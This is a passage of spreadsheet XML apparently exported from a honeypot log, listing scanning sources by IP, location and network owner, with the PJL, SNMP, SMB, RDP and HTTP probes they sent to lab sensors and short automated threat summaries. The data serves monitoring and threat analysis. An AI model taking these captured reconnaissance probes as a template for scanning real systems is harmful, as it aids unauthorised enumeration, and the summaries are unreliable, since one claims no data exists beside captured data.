    <d v="2023-11-30T11:13:09"/>
    <d v="2025-04-30T23:10:54"/>
    <n v="3834"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_ORACLE_H39&amp;&amp;SMA-LAB_REDIS_H2&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_POSTGRES_H19&amp;&amp;SMA-LAB_POP3_H45&amp;&amp;SMA-LAB_SNMP_H42&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_SNMP_H19&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_POSTGRES_H18&amp;&amp;SMA-LAB_PJL_H47&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_IMAP_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1521&amp;&amp;6379&amp;&amp;5432&amp;&amp;389&amp;&amp;110&amp;&amp;161&amp;&amp;9054&amp;&amp;9100&amp;&amp;143&amp;&amp;5900&amp;&amp;21&amp;&amp;6667&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3676"/>
    <s v="4.90414"/>
    <s v="211680"/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="NSEC - Sistemas Informaticos, S.A."/>
    <s v="business"/>
    <s v="Inap AMS"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="command&amp;&amp;connection&amp;&amp;query&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'HNBE0'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_@PJL INFO ID_x000d__x000a_@PJL INFO PRODINFO_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 77.91.74.218:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_@PJL INFO ID_x000d__x000a_@PJL INFO PRODINFO_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 185.74.222.213:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.2.0 1.3.6.1.2.1.1.3.0 1.3.6.1.2.1.1.4.0 1.3.6.1.2.1.1.5.0 1.3.6.1.2.1.1.6.0 1.3.6.1.2.1.1.7.0', 'version': '1'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 154.90.63.129:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_@PJL INFO ID_x000d__x000a_@PJL INFO PRODINFO_x000d__x000a_'}}&amp;&amp;{Data_SIP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d9c:805d"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="There is no data provided, so there's nothing to analyze. &amp;&amp; Possible malicious activity: Attempt to exploit or scan services, likely targeting SIP protocol for potential denial of service (DoS) attack. The lack of specific information suggests a probing or reconnaissance attempt. This could be the first step in a larger cyberattack. &amp;&amp; This indicates that an attempt was made to exploit a service, but no SIP traffic was detected or reported. The lack of SIP data suggests that the attack may have been aimed at a specific vulnerability or service that does not use SIP protocol. It could be a probe for potential vulnerabilities in various services. &amp;&amp; No data provided to analyze."/>
    <s v="There is no log data provided to analyze. Can you provide the actual log data for me to work with?"/>
  </r>
  <r>
    <x v="15"/>
    <x v="15"/>
    <s v="41.208.71.226.static.ltt.ly&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T23:10:26"/>
    <d v="2023-08-21T10:24:23"/>
    <d v="2025-04-30T23:10:26"/>
    <n v="596"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H20&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H25"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;1433&amp;&amp;46604&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="LY"/>
    <s v="Libya"/>
    <s v="TB"/>
    <s v="Tripoli"/>
    <s v="NA"/>
    <s v="Tripoli"/>
    <s v="2210247"/>
    <s v="NA"/>
    <s v="32.8872"/>
    <s v="13.1913"/>
    <s v="21003"/>
    <s v="LTT Autonomous System, Tripoli Libya"/>
    <s v="LTT Network Backbone and POPs"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,64266)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,64347)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,52365)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,52428)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,58851)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,58915)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,65368)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,65434)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,62400)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,62466)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,49295)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,56933)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,56996)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,64832)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,64883)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,61402)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,61499)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,58928)}&amp;&amp;{Data_SMB:Incoming connection (41.208.71.226,59015)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:29d0:47e2"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="16"/>
    <x v="16"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T23:10:25"/>
    <d v="2023-11-26T22:36:08"/>
    <d v="2025-04-30T23:10:25"/>
    <n v="281"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H28&amp;&amp;SMA-LAB_MSSQL_H31&amp;&amp;SMA-LAB_MSSQL_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;25384&amp;&amp;445&amp;&amp;59118&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.18104"/>
    <s v="106.826"/>
    <s v="7713"/>
    <s v="Telekomunikasi Indonesia (PT)"/>
    <s v="PT. Telekomunikasi Indonesia"/>
    <s v="business"/>
    <s v="Telekomunikasi Indonesia"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,48913)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,49014)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,59563)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,59648)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,44823)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,44898)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,29818)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,29921)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,12583)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,16801)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,16862)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,15611)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,36199)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,36303)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,18421)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,18488)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,40416)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,40490)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,12127)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,15390)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,15485)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,47579)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,47682)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,21754)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,21870)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,59824)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,59888)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,15120)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,44363)}&amp;&amp;{Data_SMB:Incoming connection (36.88.16.31,44443)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2458:101f"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The attackers are performing reconnaissance and enumeration activities to identify potential vulnerabilities in the network. They are probing various services, including DNS, DHCP, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and others. &amp;&amp; An incoming suspicious connection from an unknown IP address is attempting to access SMB services. This may indicate an attempt to exploit or scan the system for vulnerabilities. Further investigation is required to determine the intentions of this activity. &amp;&amp; An incoming connection was made to an SMB service from IP address 36.88.16.31, potentially attempting unauthorized file access or data transfer. This could be a scanning activity or part of a larger malicious operation. The IP might be trying to exploit vulnerabilities in the SMB service."/>
    <s v="  &amp;&amp; SMB Scanning &amp;&amp; SMB Attack"/>
  </r>
  <r>
    <x v="17"/>
    <x v="17"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T23:06:44"/>
    <d v="2023-12-01T05:59:00"/>
    <d v="2025-04-30T23:06:44"/>
    <n v="501"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MYSQL_H41&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_ORACLE_H25&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_POP3_H11&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_SMB_H21&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_LDAP_H30&amp;&amp;SMA-LAB_RDP_H15&amp;&amp;SMA-LAB_SNMP_H14&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_POSTGRES_H13&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_SNMP_H41&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_SNMP_H6&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_POP3_H5&amp;&amp;SMA-LAB_PJL_H33&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_RDP_H14&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_SOCKS5_H19&amp;&amp;SMA-LAB_SOCKS5_H26&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_PJL_H34&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_SIP_H46&amp;&amp;SMA-LAB_MYSQL_H12&amp;&amp;SMA-LAB_PJL_H2&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_MYSQL_H25&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_PJL_H4&amp;&amp;SMA-LAB_PJL_H10&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_SIP_H19&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_ORACLE_H11&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_POP3_H19&amp;&amp;SMA-LAB_PJL_H18&amp;&amp;SMA-LAB_ORACLE_H23&amp;&amp;SMA-LAB_NTP_H19&amp;&amp;SMA-LAB_SNMP_H11&amp;&amp;SMA-LAB_SOCKS5_H15&amp;&amp;SMA-LAB_PJL_H45&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_NTP_H11&amp;&amp;SMA-LAB_LDAP_H39&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_MSSQL_H47&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_MSSQL_H15&amp;&amp;SMA-LAB_SNMP_H31&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_PJL_H14"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;32328&amp;&amp;3306&amp;&amp;445&amp;&amp;1521&amp;&amp;143&amp;&amp;110&amp;&amp;389&amp;&amp;NA&amp;&amp;3389&amp;&amp;161&amp;&amp;5432&amp;&amp;6379&amp;&amp;50312&amp;&amp;56719&amp;&amp;9100&amp;&amp;57970&amp;&amp;1080&amp;&amp;57320&amp;&amp;53388&amp;&amp;1433&amp;&amp;23&amp;&amp;50065&amp;&amp;21&amp;&amp;57163&amp;&amp;56753&amp;&amp;52169&amp;&amp;49692&amp;&amp;57325&amp;&amp;5900&amp;&amp;80&amp;&amp;51313&amp;&amp;443"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2021-12-20"/>
    <s v="PAN-22"/>
    <s v="2021-12-20"/>
    <s v="connection&amp;&amp;command&amp;&amp;NA&amp;&amp;stshash&amp;&amp;query&amp;&amp;request&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,58946)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=EunmsKrPP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yVHpIW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=yJuMqR'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=xPyPrDOzn'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ijDpLT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GVywjI'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,57612)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,57624)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,57630)}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lOxHqzKSP'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cEkuaKsLE'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fWNPbP'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tlLEID'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,63166)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,63172)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,63186)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=sQVyydjYs'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=OPykuH'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=SIltXk'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ozdxEvqbu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KugpNm'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=cHwYoO'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,63418)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.232,63428)}&amp;&amp;{Data_SMB:Incoming connection 